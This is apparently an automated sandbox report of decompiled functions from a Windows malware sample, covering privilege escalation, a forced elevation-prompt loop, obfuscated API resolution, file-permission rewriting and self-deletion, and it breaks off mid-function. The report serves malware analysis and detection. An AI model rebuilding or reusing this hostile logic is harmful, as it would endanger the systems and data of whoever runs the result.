            • Opcode Fuzzy Hash: 5e148bd27f3ccf9e0a98f87db1de86940834b66f6490decd861e12d8175c87d9
            • Instruction Fuzzy Hash: E671E271D08204ABDB11EFE5DE81EEEB7BCFF85720F54802EF505A2152EB749A019B24
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B395D, Relevance: 12.2, APIs: 8, Instructions: 201memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 222 9b395d-9b3973 224 9b397d-9b3990 222->224 225 9b3975-9b3978 222->225 228 9b399a-9b39b9 224->228 229 9b3992-9b3998 224->229 226 9b3b67-9b3b6b 225->226 232 9b39bb-9b39c3 228->232 233 9b39c8-9b3a17 call 9b5e33 SysAllocString SysFreeString 228->233 229->225 237 9b3b66 232->237 239 9b3a19-9b3a2a 233->239 240 9b3a2f-9b3ae9 call 9b5e33 * 2 SysAllocString * 2 233->240 237->226 245 9b3b65 239->245 252 9b3aed-9b3aff SysFreeString * 2 240->252 245->237 253 9b3b01-9b3b04 252->253 254 9b3b06-9b3b20 GetCurrentProcess WaitForSingleObject 252->254 255 9b3b22-9b3b63 253->255 254->255 255->245
            C-Code - Quality: 41%
            			E009B395D() {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				short _v26;
				char _v32;
				short _v36;
				char _v56;
				short _v58;
				char _v232;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t55;
				intOrPtr _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				void* _t74;
				void* _t75;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t93;
				intOrPtr* _t94;
				void* _t101;
				void* _t105;
				intOrPtr* _t107;
				intOrPtr* _t110;
				intOrPtr _t116;
				intOrPtr* _t117;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t133;

				_t45 =  *0x9c12c0(0, 0); // executed
				if(_t45 >= 0) {
					_t46 =  *0x9c10fc(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0); // executed
					if(_t46 >= 0) {
						_v12 = 0;
						_t48 =  *0x9c1320(0x9bd114, 0, 1, 0x9bd134,  &_v12, _t101); // executed
						if(_t48 >= 0) {
							_v8 = 0;
							E009B5E33(0x9c0270, 0x24a, 0xe, 0x14,  &_v56);
							_v36 = 0;
							_t53 =  *0x9c12a4( &_v56, _t124);
							_t107 = _v12;
							_t125 = _t53;
							_t55 =  *((intOrPtr*)( *_t107 + 0xc))(_t107, _t125, 0, 0, 0, 0, 0, 0,  &_v8);
							 *0x9c1268(_t125);
							if(_t55 >= 0) {
								_v20 = 0;
								 *0x9c1320(0x9bd124, 0, 4, 0x9bd0d4,  &_v20);
								_t59 =  *0x9c0054; // 0x9c0040
								 *((intOrPtr*)(_t59 + 4))(0x9c0054);
								_t61 = _v20;
								_v24 = 0;
								 *((intOrPtr*)( *_t61 + 0xc))(_t61, 0x9c0054,  &_v24);
								_t63 = _v24;
								_v16 = 0;
								 *((intOrPtr*)( *_t63))(_t63, 0x9bd0c4,  &_v16);
								E009B5E33(0x9c0270, 0xc4, 0xe, 6,  &_v32);
								_v26 = 0;
								E009B5E33(0x9c0270, 0xa86, 0xd, 0xae,  &_v232);
								_v58 = 0;
								_t105 =  *0x9c12a4( &_v32);
								_t74 =  *0x9c12a4( &_v232);
								_t110 = _v8;
								_t127 = _t74;
								_t75 =  *((intOrPtr*)( *_t110 + 0x5c))(_t110, _t105, _t127, 0x80, 0, _v16);
								 *0x9c1268(_t105);
								 *0x9c1268(_t127);
								if(_t75 >= 0) {
									WaitForSingleObject(GetCurrentProcess(), 0xffffffff);
									_t80 = _v8;
									 *((intOrPtr*)( *_t80 + 0x10))(_t80, _v16);
									_t133 = 0;
								} else {
									_t133 = 1;
								}
								_t82 = _v8;
								 *((intOrPtr*)( *_t82 + 8))(_t82);
								_t84 = _v12;
								 *((intOrPtr*)( *_t84 + 8))(_t84);
								_t86 = _v20;
								 *((intOrPtr*)( *_t86 + 8))(_t86);
								_t88 = _v24;
								 *((intOrPtr*)( *_t88 + 8))(_t88);
								_t116 =  *0x9c0054; // 0x9c0040
								 *((intOrPtr*)(_t116 + 8))(0x9c0054);
								_t117 = _v16;
								 *((intOrPtr*)( *_t117 + 8))(_t117);
								 *0x9c12d4();
								_t93 = _t133;
							} else {
								_t94 = _v12;
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *0x9c12d4();
								_t93 = 1;
							}
						} else {
							 *0x9c12d4();
							_t93 = 1;
						}
						return _t93;
					}
					 *0x9c12d4();
				}
				return 1;
			}









































            0x009b396b
            0x009b3973
            0x009b3988
            0x009b3990
            0x009b399e
            0x009b39b1
            0x009b39b9
            0x009b39cc
            0x009b39de
            0x009b39e8
            0x009b39f0
            0x009b39f6
            0x009b39f9
            0x009b3a09
            0x009b3a0f
            0x009b3a17
            0x009b3a42
            0x009b3a45
            0x009b3a4b
            0x009b3a56
            0x009b3a59
            0x009b3a60
            0x009b3a67
            0x009b3a6a
            0x009b3a71
            0x009b3a7c
            0x009b3a91
            0x009b3a98
            0x009b3ab0
            0x009b3aba
            0x009b3ac8
            0x009b3ad1
            0x009b3ada
            0x009b3add
            0x009b3aea
            0x009b3af0
            0x009b3af7
            0x009b3aff
            0x009b3b0e
            0x009b3b14
            0x009b3b1d
            0x009b3b20
            0x009b3b01
            0x009b3b03
            0x009b3b03
            0x009b3b22
            0x009b3b28
            0x009b3b2b
            0x009b3b31
            0x009b3b34
            0x009b3b3a
            0x009b3b3d
            0x009b3b43
            0x009b3b46
            0x009b3b51
            0x009b3b54
            0x009b3b5a
            0x009b3b5d
            0x009b3b63
            0x009b3a19
            0x009b3a19
            0x009b3a1f
            0x009b3a22
            0x009b3a28
            0x009b3a28
            0x009b39bb
            0x009b39bb
            0x009b39c1
            0x009b39c1
            0x00000000
            0x009b3b66
            0x009b3992
            0x009b3992
            0x00000000

            APIs
            • SysAllocString.OLEAUT32(?), ref: 009B39F0
            • SysFreeString.OLEAUT32(00000000), ref: 009B3A0F
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: ea26d9e5883599612d9133f1307954d72319702e5525d6ee7a14e3e627de3f1f
            • Instruction ID: d6d3bd48df5097d9420133e7f477c4a720b1085f968a40f7d63d3455b0d5e74d
            • Opcode Fuzzy Hash: ea26d9e5883599612d9133f1307954d72319702e5525d6ee7a14e3e627de3f1f
            • Instruction Fuzzy Hash: 44618A35A04219BFCB10DBA4CD88EEFBBBCEF4A724F104159F515E7291DA709A01DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B37A8, Relevance: 12.1, APIs: 8, Instructions: 91threadCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 67%
            			E009B37A8(void* __edi) {
				char _v5;
				char _v12;
				void* __ebx;
				void* __ecx;
				void* _t11;
				WCHAR* _t16;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t29;
				void* _t34;
				WCHAR* _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;

				 *0x9c1090(0x80000001, _t34, _t26, _t29, _t29);
				E009B2B79(__edi);
				_v5 = 0;
				RtlAdjustPrivilege(0x14, 1, 0,  &_v5);
				_t39 =  *0x9c2310; // 0x1
				if(_t39 != 0) {
					_t20 = CreateThread(0, 0, E009B395D, 0, 0, 0); // executed
					E009B4BEE(_t20); // executed
					E009B3B6E(); // executed
					 *_t37 = E009B2C30;
					_push(0);
					_push(0); // executed
					E009B5425(); // executed
					_t37 = _t37 + 0xc;
					_t24 = CreateThread(0, 0, E009B2923, 0, 0, 0); // executed
					E009B4BEE(_t24); // executed
					_pop(_t29);
				}
				RtlAdjustPrivilege(9, 1, 0,  &_v5); // executed
				_t11 = E009B32A6(); // executed
				if(_t11 != 0) {
					_t41 =  *0x9c230c; // 0x0
					if(_t41 == 0) {
						E009B46DE();
						_t42 =  *0x9c230c; // 0x0
						if(_t42 == 0) {
							_t43 =  *0x9c22f0; // 0x0
							if(_t43 != 0) {
								E009B5E55(_t29, _t43,  *0x9c2258, 0x3b, 0, E009B2C57);
							}
						}
					}
				}
				E009B1415(0); // executed
				RevertToSelf(); // executed
				 *0x9c1090(0x80000000);
				_t16 = E009B4F8D(0,  &_v12);
				_t35 = _t16;
				if(_t35 != 0) {
					MoveFileExW(_t35, 0, 4); // executed
					_t16 = E009B4999(_t35);
				}
				return _t16;
			}




















            0x009b37b4
            0x009b37ba
            0x009b37ca
            0x009b37cd
            0x009b37d3
            0x009b37d9
            0x009b37e5
            0x009b37ec
            0x009b37f1
            0x009b37f6
            0x009b37fd
            0x009b37fe
            0x009b37ff
            0x009b3804
            0x009b3811
            0x009b3818
            0x009b381d
            0x009b381d
            0x009b3827
            0x009b382d
            0x009b3834
            0x009b3836
            0x009b383c
            0x009b383e
            0x009b3843
            0x009b3849
            0x009b384b
            0x009b3851
            0x009b3861
            0x009b3866
            0x009b3851
            0x009b3849
            0x009b383c
            0x009b3869
            0x009b386e
            0x009b3878
            0x009b3883
            0x009b3888
            0x009b388e
            0x009b3894
            0x009b389b
            0x009b38a0
            0x009b38a6

            APIs
            • SetThreadExecutionState.KERNEL32(80000001), ref: 009B37B4
            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 009B37CD
            • CreateThread.KERNELBASE(00000000,00000000,009B395D,00000000,00000000,00000000), ref: 009B37E5
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
              • Part of subcall function 009B3B6E: OpenSCManagerW.SECHOST(00000000,ServicesActive,00000004,00000000,00000000), ref: 009B3B80
              • Part of subcall function 009B5425: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009B5435
            • CreateThread.KERNELBASE(00000000,00000000,009B2923,00000000,00000000,00000000), ref: 009B3811
            • RtlAdjustPrivilege.NTDLL(00000009,00000001,00000000,?), ref: 009B3827
            • RevertToSelf.ADVAPI32(?,00000600,00000600,?,009B4409,?,009B441B,00000000), ref: 009B386E
            • SetThreadExecutionState.KERNEL32(80000000), ref: 009B3878
            • MoveFileExW.KERNELBASE(00000000,00000000,00000004,?,00000600,00000600,?,009B4409,?,009B441B,00000000), ref: 009B3894
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Thread$Create$AdjustExecutionPrivilegeState$ChangeCloseFileFindManagerMoveNotificationOpenRevertSelfSnapshotToolhelp32
            • String ID:
            • API String ID: 865017910-0
            • Opcode ID: 95348c11aa5627f93c043374b2818d5403a0354696e03dd335aa1d923962aa36
            • Instruction ID: 9e59081e826106cbf7bba052de5b356c5da2fe4959778c622cda567c633592f1
            • Opcode Fuzzy Hash: 95348c11aa5627f93c043374b2818d5403a0354696e03dd335aa1d923962aa36
            • Instruction Fuzzy Hash: 7A2196B1858318BFE710BBA0AE86FFF375CDB417A9F008429F60195093DA754E4496B6
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5982, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 100%
            			E009B5982(void* __ebx, void* __edi) {
				char _v8;
				short _v10;
				char _v20;
				struct _SHELLEXECUTEINFOW _v80;
				void* __esi;
				void* _t22;
				void* _t46;
				intOrPtr _t47;

				_t46 = GetCurrentProcess();
				_t22 = E009B5408();
				if(_t22 >= 0x600) {
					_t22 = E009B4DB2(_t46); // executed
					if(_t22 == 3) {
						_t22 = E009B4EBA(_t46, _t46);
						if(_t22 < 0x3000) {
							E009B56F7();
							_t47 = E009B4F8D(0,  &_v8);
							if(_t47 != 0) {
								_t45 = E009B5359();
								E009B5E33(0x9c1338, 0x66e, 6, 0xa,  &_v20);
								_v80.cbSize = 0x3c;
								_v80.fMask = 0;
								_v10 = 0;
								_v80.hwnd = GetForegroundWindow();
								_v80.lpVerb =  &_v20;
								_v80.lpFile = _t47;
								_v80.lpParameters = _t26;
								_v80.lpDirectory = 0;
								_v80.nShow = 1;
								_v80.hInstApp = 0;
								_v80.lpIDList = 0;
								_v80.lpClass = 0;
								_v80.hkeyClass = 0;
								_v80.dwHotKey = 0;
								_v80.hIcon = 0;
								_v80.hProcess = 0;
								do {
								} while (ShellExecuteExW( &_v80) == 0);
								E009B4999(_t47);
								_t22 = E009B4999(_t45);
								ExitProcess(0);
							}
							ExitProcess(0);
						}
					}
				}
				return _t22;
			}











            0x009b598f
            0x009b5991
            0x009b599e
            0x009b59a5
            0x009b59ae
            0x009b59b5
            0x009b59c0
            0x009b59c8
            0x009b59d9
            0x009b59df
            0x009b59ed
            0x009b5a01
            0x009b5a09
            0x009b5a12
            0x009b5a15
            0x009b5a1f
            0x009b5a25
            0x009b5a28
            0x009b5a2b
            0x009b5a2e
            0x009b5a31
            0x009b5a38
            0x009b5a3b
            0x009b5a3e
            0x009b5a41
            0x009b5a44
            0x009b5a47
            0x009b5a4a
            0x009b5a4d
            0x009b5a57
            0x009b5a5c
            0x009b5a62
            0x009b5a6a
            0x009b5a6a
            0x009b59e2
            0x009b59e2
            0x009b59c0
            0x009b59ae
            0x009b5a76

            APIs
            • GetCurrentProcess.KERNEL32(00000000), ref: 009B5989
              • Part of subcall function 009B4DB2: OpenProcessToken.ADVAPI32(009B59AA,00000008,009B59AA,?,009B59AA), ref: 009B4DC5
              • Part of subcall function 009B4DB2: GetTokenInformation.KERNELBASE(009B59AA,00000012(TokenIntegrityLevel),00000000,00000004,?,?,009B59AA), ref: 009B4DDE
              • Part of subcall function 009B4EBA: OpenProcessToken.ADVAPI32(009B59BA,00000008,00000000), ref: 009B4ECC
              • Part of subcall function 009B4EBA: GetTokenInformation.ADVAPI32(00000000,00000019(TokenIntegrityLevel),?,0000004C,009B59BA), ref: 009B4EE5
              • Part of subcall function 009B4EBA: IsValidSid.ADVAPI32(?,00000000), ref: 009B4EF4
              • Part of subcall function 009B56F7: ReleaseMutex.KERNEL32(009B59CD), ref: 009B56FD
              • Part of subcall function 009B4F8D: GetModuleFileNameW.KERNEL32(?,00000000,00000106,?,?,00000000,?,009B2B98,00000000,?,00000000), ref: 009B4FB1
            • ExitProcess.KERNEL32 ref: 009B59E2
            • GetForegroundWindow.USER32 ref: 009B5A19
            • ShellExecuteExW.SHELL32(0000003C), ref: 009B5A51
            • ExitProcess.KERNEL32 ref: 009B5A6A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Process$Token$ExitInformationOpen$CurrentExecuteFileForegroundModuleMutexNameReleaseShellValidWindow
            • String ID: <
            • API String ID: 491521492-4251816714
            • Opcode ID: 5347c54fdc8f437ed2def149ad722702e5960ca2f28b93014f0e38fd07ff66db
            • Instruction ID: edb1a43b7441978e30040abf95b6fb51d91e37d6e7a282c69e98b2abebfbda78
            • Opcode Fuzzy Hash: 5347c54fdc8f437ed2def149ad722702e5960ca2f28b93014f0e38fd07ff66db
            • Instruction Fuzzy Hash: 36215EB1C00318ABDB10EFB59985BEEBBB8FF49320F51012EE405F6242EB7489418B65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B6D7C, Relevance: 9.1, APIs: 6, Instructions: 106libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 100%
            			E009B6D7C() {
				char _v6;
				char _v20;
				char _v22;
				char _v36;
				char _v40;
				char _v56;
				char _v59;
				char _v76;
				char _v80;
				char _v100;
				char _v103;
				char _v124;
				intOrPtr _t21;
				_Unknown_base(*)()* _t51;
				char _t54;

				_t54 = 0;
				do {
					_t21 = E009B70D1( *((intOrPtr*)(_t54 + 0x9c1058))); // executed
					 *((intOrPtr*)(_t54 + 0x9c1058)) = _t21;
					_t54 = _t54 + 4;
				} while (_t54 < 0x2dc);
				E009B5E33(0x9c1338, 0x5f8, 0xb, 0x15,  &_v124);
				_v103 = 0;
				E009B5E33(0x9c1338, 0x576, 6, 0xe,  &_v20);
				_v6 = 0;
				E009B5E33(0x9c1338, 0x648, 0xb, 0x14,  &_v100);
				_v80 = 0;
				E009B5E33(0x9c1338, 0x9fc, 0xd, 0x10,  &_v56);
				_v40 = 0;
				E009B5E33(0x9c1338, 0x4cd, 0xe, 0xe,  &_v36);
				_v22 = 0;
				E009B5E33(0x9c1338, 0x9d9, 6, 0x11,  &_v76);
				_v59 = 0;
				 *0x9c109c = GetProcAddress(E009B6FEC(),  &_v124);
				 *0x9c12c0 = GetProcAddress(E009B6FEC(),  &_v20);
				 *0x9c10fc = GetProcAddress(E009B6FEC(),  &_v100);
				 *0x9c1320 = GetProcAddress(E009B6FEC(),  &_v56);
				 *0x9c12d4 = GetProcAddress(E009B6FEC(),  &_v36);
				_t51 = GetProcAddress(E009B6FEC(),  &_v76);
				 *0x9c1084 = _t51;
				return _t51;
			}


















            0x009b6d86
            0x009b6d88
            0x009b6d8e
            0x009b6d93
            0x009b6d99
            0x009b6d9d
            0x009b6db8
            0x009b6dc0
            0x009b6dce
            0x009b6dd6
            0x009b6de4
            0x009b6dec
            0x009b6dfa
            0x009b6e02
            0x009b6e13
            0x009b6e1b
            0x009b6e29
            0x009b6e31
            0x009b6e44
            0x009b6e59
            0x009b6e6e
            0x009b6e83
            0x009b6e98
            0x009b6ea7
            0x009b6eae
            0x009b6eb7

            APIs
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E3E
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E53
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E68
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E7D
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E92
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6EA7
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc
            • String ID:
            • API String ID: 190572456-0
            • Opcode ID: e366e22bd7d90215bcb9205d5f9d814b7d5e71714c6e75f8a9fd04f4e93578b2
            • Instruction ID: 5f3dd8834902b9d82f791bb4fd23a28e5e1569d26d195e96ecb72150c5df505c
            • Opcode Fuzzy Hash: e366e22bd7d90215bcb9205d5f9d814b7d5e71714c6e75f8a9fd04f4e93578b2
            • Instruction Fuzzy Hash: 5631D471C89388BAEB11EBB09D06FEF7B6CAB09710F000416F904F7183D77596848B65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B27A0, Relevance: 7.6, APIs: 5, Instructions: 148COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 352 9b27a0-9b27af 353 9b2915-9b291b 352->353 354 9b27b5-9b27b9 352->354 355 9b27ba-9b27f5 call 9b5e33 354->355 359 9b2801-9b2830 call 9b5e33 355->359 360 9b27f7-9b27fb VariantClear 355->360 363 9b2834-9b2836 359->363 360->359 364 9b2909-9b290d 363->364 365 9b283c-9b284f 363->365 364->355 366 9b2913-9b2914 364->366 368 9b28ff-9b2903 VariantClear 365->368 369 9b2855-9b288d call 9b5e33 365->369 366->353 368->364 373 9b288f-9b289e call 9b2cac VariantClear 369->373 374 9b28a4-9b28dd call 9b5e33 369->374 373->374 380 9b28df-9b28ee StrToIntW VariantClear 374->380 381 9b28f4-9b28f6 374->381 380->381 381->368 382 9b28f8-9b28fe call 9b4199 381->382 382->368
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ClearVariant
            • String ID:
            • API String ID: 1473721057-0
            • Opcode ID: 298df114b84197fa1bd45a92f8edf962765658120e70966da3cd433dd31fdd96
            • Instruction ID: 4fc471b5c3aac2eaf6c0b215f03210c87f097c57b6de35a1719e2ce1fbb74508
            • Opcode Fuzzy Hash: 298df114b84197fa1bd45a92f8edf962765658120e70966da3cd433dd31fdd96
            • Instruction Fuzzy Hash: B1414871A50209BFEB10DBA4CC89FEFB3B8FF99B14F054419F515EB191EA70A9058B60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5659, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 385 9b5659-9b566b 386 9b56c9-9b56db SetFileSecurityW 385->386 387 9b566d-9b5683 GetCurrentProcess OpenProcessToken 385->387 388 9b56ee-9b56f6 386->388 390 9b56dd-9b56eb SetFileSecurityW 386->390 387->388 389 9b5685-9b5698 call 9b494c 387->389 389->388 393 9b569a-9b56af GetTokenInformation 389->393 390->388 393->388 394 9b56b1-9b56c4 393->394 394->386
            C-Code - Quality: 100%
            			E009B5659(void* __ecx, WCHAR* _a4) {
				long _v8;
				int _t4;
				void* _t9;
				int _t10;
				void* _t11;
				void* _t25;
				void* _t27;

				_t25 = 0;
				_t27 =  *0x9c1dd8 - _t25; // 0x1
				if(_t27 != 0) {
					L5:
					_t4 = SetFileSecurityW(_a4, 1, 0x9c1da8); // executed
					if(_t4 != 0) {
						SetFileSecurityW(_a4, 4, 0x9c1da8); // executed
						_t25 =  !=  ? 1 : _t25;
					}
					L7:
					return _t25;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8, 0x9c1dbc) == 0) {
					goto L7;
				}
				_t9 = E009B494C(0x200);
				 *0x9c1dd4 = _t9;
				if(_t9 == 0) {
					goto L7;
				}
				_t10 = GetTokenInformation( *0x9c1dbc, 1, _t9, 0x200,  &_v8); // executed
				if(_t10 == 0) {
					goto L7;
				}
				_t11 =  *0x9c1dd4; // 0x2b56008
				0x9c1da8->Revision = 1;
				 *0x9c1dd8 = 1;
				 *0x9c1dac =  *_t11;
				goto L5;
			}










            0x009b5661
            0x009b5665
            0x009b566b
            0x009b56c9
            0x009b56d3
            0x009b56db
            0x009b56e3
            0x009b56eb
            0x009b56eb
            0x009b56ee
            0x009b56f6
            0x009b56f6
            0x009b5683
            0x00000000
            0x00000000
            0x009b568b
            0x009b5690
            0x009b5698
            0x00000000
            0x00000000
            0x009b56a7
            0x009b56af
            0x00000000
            0x00000000
            0x009b56b1
            0x009b56b6
            0x009b56bc
            0x009b56c4
            0x00000000

            APIs
            • GetCurrentProcess.KERNEL32(?,?,?,?,?,009B2D0D,?), ref: 009B566D
            • OpenProcessToken.ADVAPI32(00000000,00000008,009C1DBC,?,?,?,?,?,009B2D0D,?), ref: 009B567B
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • GetTokenInformation.KERNELBASE(00000001,00000000,00000200,?,?,?,?,?,?,009B2D0D,?), ref: 009B56A7
            • SetFileSecurityW.KERNELBASE(?,00000001,009C1DA8,?,?,?,?,?,009B2D0D,?), ref: 009B56D3
            • SetFileSecurityW.KERNELBASE(?,00000004,009C1DA8,?,?,?,?,?,009B2D0D,?), ref: 009B56E3
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Process$FileHeapSecurityToken$CreateCurrentInformationOpen
            • String ID:
            • API String ID: 360669253-0
            • Opcode ID: bfc49b22f4b83e92bbd854b3484567619da4f0f5f23bb9accda82b78b96d986e
            • Instruction ID: af3347f09665253dfacada8c32c577bc8f2f7e4de04b97cab4754faa88ded1d9
            • Opcode Fuzzy Hash: bfc49b22f4b83e92bbd854b3484567619da4f0f5f23bb9accda82b78b96d986e
            • Instruction Fuzzy Hash: A8116571F18204AFE7209F66ED44FA77BACEB46B61B45402DF506C25A2DA309C50EB68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B2ED8, Relevance: 6.2, APIs: 4, Instructions: 156COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 461 9b2ed8-9b2f01 call 9b7895 464 9b2f1a-9b2f23 461->464 465 9b2f03-9b2f06 461->465 468 9b2f2f-9b2f41 call 9b7540 464->468 469 9b2f25 464->469 466 9b2f08 465->466 467 9b2f43-9b2f6d call 9b78d4 call 9b78bb 465->467 474 9b2f0a-9b2f11 466->474 475 9b2f13-9b2f14 call 9b4bee 466->475 487 9b2f78 467->487 488 9b2f6f-9b2f76 467->488 479 9b2fc1-9b2fc5 468->479 470 9b2f2c 469->470 471 9b2f27-9b2f2a 469->471 470->468 471->468 471->470 474->467 474->475 481 9b2f19 475->481 483 9b2fa0-9b2fa8 RtlGetLastWin32Error 479->483 484 9b2fc7-9b2fe6 479->484 481->464 485 9b2faa-9b2fbe call 9b575c call 9b7540 483->485 486 9b2f99-9b2f9b 483->486 489 9b304e-9b3065 call 9b75bb 484->489 485->479 490 9b3070-9b3076 486->490 492 9b2f7a-9b2f7b call 9b4bee 487->492 488->487 488->492 499 9b2fe8-9b2ff8 RtlGetLastWin32Error 489->499 500 9b3067-9b306d call 9b3077 489->500 498 9b2f80-9b2f83 492->498 498->464 505 9b2f85-9b2f97 call 9b69b3 498->505 503 9b2ffa-9b2ffd 499->503 504 9b3026-9b3028 call 9b7554 499->504 512 9b306f 500->512 509 9b2fff-9b3010 call 9b5659 GetFileAttributesW 503->509 510 9b3032-9b3035 503->510 513 9b302d-9b3030 504->513 505->464 505->486 509->504 519 9b3012-9b3014 509->519 514 9b304a-9b304c 510->514 515 9b3037-9b3049 call 9b5a77 call 9b575c 510->515 512->490 513->512 514->489 515->514 519->514 521 9b3016-9b3024 SetFileAttributesW 519->521 521->504 521->514
            C-Code - Quality: 69%
            			E009B2ED8(signed int __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v24;
				char _v64;
